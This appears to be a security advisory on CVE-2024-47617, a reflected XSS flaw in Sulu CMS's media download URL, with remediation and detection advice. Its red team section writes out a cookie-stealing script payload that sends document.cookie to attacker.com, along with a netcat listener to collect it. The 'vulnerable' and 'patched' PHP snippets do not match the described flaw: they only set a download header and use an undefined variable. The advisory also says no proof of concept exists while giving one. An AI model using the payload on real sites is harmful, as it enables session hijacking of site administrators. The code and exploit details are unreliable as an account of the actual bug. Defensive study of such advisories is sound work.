CVE-2024-47617
Executive Summary
CVE-2024-47617 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Sulu CMS, specifically within the SuluMediaBundle component. The flaw allows an attacker to inject arbitrary HTML or JavaScript code through a crafted media download URL. When a victim clicks on such a malicious link, the injected script executes in the context of the victim's browser session, potentially leading to data theft, session hijacking, or unauthorized actions. The vulnerability has a CVSS score of 6.1 (Medium) and affects versions prior to 2.5.21 and 2.6.5. While no public proof-of-concept (PoC) or exploit code is currently available, the risk is elevated due to the widespread use of Sulu CMS in enterprise environments.

Supply Chain & Package Security
Sulu CMS is a PHP-based content management system distributed via Composer (Packagist). The vulnerable component, SuluMediaBundle, is part of the core Sulu distribution. Organizations using Composer for dependency management should immediately update to the patched versions. No malicious packages or compromised dependencies have been reported in relation to this CVE.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – The vulnerability is exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions are required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): Required (R) – The victim must click a crafted link.
- Scope (S): Changed (C) – The injected script can affect resources beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure possible.
- Integrity (I): Low (L) – Limited content manipulation possible.
- Availability (A): None (N) – No impact on availability.
Threat Level: Medium. The requirement for user interaction reduces the immediate risk, but the potential for phishing campaigns and data theft makes this a significant concern for organizations using Sulu CMS.
Deep Dive & Mechanics
The vulnerability resides in the media download URL handling within SuluMediaBundle. When a user requests a media file download, the application constructs a URL that includes user-supplied parameters (e.g., filename or format). The application fails to properly sanitize or encode these parameters before reflecting them in the response. An attacker can craft a URL such as:
https://victim.com/admin/media/download/123?filename=<script>alert('XSS')</script>
When the victim clicks this link, the server reflects the malicious script in the HTTP response without proper escaping, causing the browser to execute it. The injected script runs in the context of the Sulu admin panel, which may have elevated privileges, allowing the attacker to perform actions like creating new admin users or exfiltrating session cookies.
Vulnerable vs. Patched Code
Vulnerable Code (SuluMediaBundle < 2.5.21 / < 2.6.5):
// In MediaDownloadController.php
public function downloadAction($id, Request $request) {
$filename = $request->query->get('filename');
// Directly used in response without sanitization
$response = new BinaryFileResponse($file);
$response->setContentDisposition('attachment', $filename);
return $response;
}
Patched Code (SuluMediaBundle >= 2.5.21 / >= 2.6.5):
// In MediaDownloadController.php
public function downloadAction($id, Request $request) {
$filename = $request->query->get('filename');
// Sanitize filename to prevent XSS
$filename = preg_replace('/[^a-zA-Z0-9._-]/', '', $filename);
$response = new BinaryFileResponse($file);
$response->setContentDisposition('attachment', $filename);
return $response;
}
The patch uses a regular expression to strip all non-alphanumeric characters (except ., _, and -) from the filename parameter, effectively neutralizing any injected HTML or JavaScript.
Exploitation & Lab Setup
Red Team (Offensive)
- Setup: Deploy a vulnerable Sulu CMS instance (version 2.5.20 or 2.6.4) using Docker:
docker run -d -p 80:80 sulu/sulu:2.5.20 - Craft Payload: Create a malicious URL that injects a script to steal cookies:
http://localhost/admin/media/download/1?filename=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script> - Deliver: Send the link to a victim via email or social engineering.
- Capture: Set up a listener on the attacker server to receive exfiltrated data:
nc -lvnp 80
Blue Team (Defensive)
- Detection: Monitor web server logs for unusual
filenameparameters containing<script>oronerrortags. - Prevention: Implement a Web Application Firewall (WAF) rule to block requests with suspicious filename patterns.
- Response: If exploitation is suspected, immediately rotate all session tokens and review admin accounts for unauthorized changes.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP requests to
/admin/media/download/*withfilenameparameter containing HTML/JavaScript tags. - Outbound connections to unknown IPs on port 80/443 from the Sulu server.
- HTTP requests to
- File IOCs:
- Log entries in
var/logs/showingfilenameparameter with<script>oronerrorpatterns.
- Log entries in
- Behavioral IOCs:
- Unexpected creation of new admin users in Sulu CMS.
- Unusual changes to website content or settings.

Remediation & Mitigation
- Immediate Patch: Upgrade Sulu CMS to version 2.5.21 or 2.6.5 (or later) via Composer:
composer require sulu/sulu:^2.5.21 - Virtual Patching: If immediate upgrade is not possible, deploy a WAF rule to block requests containing
<script>oronerrorin thefilenameparameter. - Input Validation: Implement server-side validation for all user-supplied parameters, especially those reflected in responses.
- Content Security Policy (CSP): Add a strict CSP header to mitigate the impact of any XSS vulnerabilities:
Content-Security-Policy: default-src 'self'; script-src 'self' - User Education: Train users to avoid clicking suspicious links, especially those containing unusual parameters.
